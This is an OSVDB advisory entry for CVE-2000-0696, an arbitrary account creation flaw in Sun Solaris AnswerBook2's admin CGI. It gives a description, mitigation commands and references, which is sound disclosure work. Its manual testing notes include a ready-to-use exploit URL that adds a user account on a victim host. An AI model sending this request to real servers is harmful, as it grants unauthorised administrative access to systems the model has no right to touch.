Sun AnswerBook2 dwhttpd Arbitrary Account Creation

2000-08-08T00:00:00
ID OSVDB:8679
Type osvdb
Reporter Lluis Mora(llmora@s21sec.com)
Modified 2000-08-08T00:00:00

Description

Vulnerability Description

Sun Microsystems Solaris AnswerBook2 contains a flaw that may allow a malicious user to create an arbitrary account. The issue is triggered when a malicious user directly accesses the /cgi-bin/admin/admin script and passes it parameters to create a new user account. The new user account can then be used to access the admin functionality of AnswerBook2 resulting in a loss of integrity.

Solution Description

Upgrade to version 1.4.2 patched or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): disable the AnswerBook2 Documentation Server, the following commands can be run as the root user:

/usr/lib/ab2/bin/ab2admin -o stop

/usr/lib/ab2/bin/ab2admin -o autostart_no

Short Description

Sun Microsystems Solaris AnswerBook2 contains a flaw that may allow a malicious user to create an arbitrary account. The issue is triggered when a malicious user directly accesses the /cgi-bin/admin/admin script and passes it parameters to create a new user account. The new user account can then be used to access the admin functionality of AnswerBook2 resulting in a loss of integrity.

Manual Testing Notes

http://[victim]:8888/cgi-bin/admin/admin?command=add_user&uid=percebe&password=percebe&re_password=percebe

References:

Vendor Specific Advisory URL Vendor Specific Advisory URL Related OSVDB ID: 8680 ISS X-Force ID: 5069 CVE-2000-0696 CIAC Advisory: l-031 CIAC Advisory: o-012 Bugtraq ID: 1554